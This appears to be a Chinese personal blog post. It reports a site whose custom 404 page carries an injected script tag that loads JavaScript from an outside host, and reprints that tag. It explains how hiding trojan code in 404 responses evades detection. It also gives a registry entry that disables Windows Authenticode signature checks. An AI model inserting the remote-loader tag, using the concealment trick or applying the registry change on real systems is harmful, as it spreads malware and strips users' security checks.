来源:六翼刺猬的某某刺猬窝
http://www.688ip.com/dae5g45
今天在卡饭看到的被说是挂马的东西,想要获取源码但返回了404;
细心一看,的确被挂马了,从服务器那里返回的404信息里面包含了挂马代码:
<script src=”http://ad.shitip.com/file/da.js”></script>
貌似最近第三次看到了;
P.S. 某服务器返回的404信息是可以自定义的,如Google的那些:http://www.google.com/2.htm
细想一下,这样是一个不错的挂马选择:
先把挂马代码插入到要返回的404信息里面;
然后才在正常的页面里面写入<iframe>框架或者<script>脚本,src指向本地域名的一个无效URL;
只要URL的名称不是太难看,足以让一些站长昏头转向,找不着马来,对于我等找马的人来说也是挺麻烦的。
DI+#KE#=XD+I+K=E#XD+IK+$E=X+DIK##EXD$#IK#=E#$X=DI+K=EX#+D#IK$=EX++DIK$+E#+X+D=#I#K#$E=XD$=I$+K$$E=XD+$I=$K+杂谈时间:
无意中发现了一样东西:
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE/SOFTWARE/Policies/Microsoft/SystemCertificates/TrustedPublisher/Safer] "AuthenticodeFlags"=dword:00000101导入上面的注册表信息后,你将会发现Windows的文件校验失效,导致autoruns等调用微软的校验的软件全部失效,显示所有的文件都没有通过微软认证(SRENG等第三方的无碍);
还有QQ医生无法运行,证书也会出现问题,自动更新无法进行……
哈哈,还是挺好用的一个东西
+D$IKE#XDIKEXD$I#K$E#$X=D+#I#$K+E=X=#D#I++K+=EX##DI+=K=E$$XD$IK#+EX+DI$=KE#XDIK+EX=D=#IK++EXD$#IKEX=DAD时间:
关于我弄的那个BLOG解谜游戏:One Place——Who Will Find It,貌似开始的谜题出得有点偏了,没有什么人玩,而且只有小花的进度比较快
后面的应该不会显得太偏了,有点像是那些密室游戏
顺便把“禁止贴出任何提示”这个禁令取消了,各位想贴什么就贴吧
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论